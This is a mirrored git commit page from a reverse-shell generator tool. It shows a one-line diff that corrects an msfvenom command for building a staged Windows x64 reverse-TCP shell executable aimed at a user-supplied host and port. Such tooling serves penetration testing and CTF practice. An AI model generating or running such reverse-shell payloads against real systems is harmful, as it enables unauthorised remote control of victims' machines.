mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2025-02-23 06:54:43 +00:00
Merge pull request #91 from egglessness/main
Fixed Windows Staged Reverse TCP (x64)
This commit is contained in:
commit
045a40e3ca
@ -355,7 +355,7 @@ const msfvenomCommands = withCommandType(
|
|||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "Windows Staged Reverse TCP (x64)",
|
"name": "Windows Staged Reverse TCP (x64)",
|
||||||
"command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
|
"command": "msfvenom -p windows/x64/shell/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe",
|
||||||
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
|
"meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
|
Loading…
Reference in New Issue
Block a user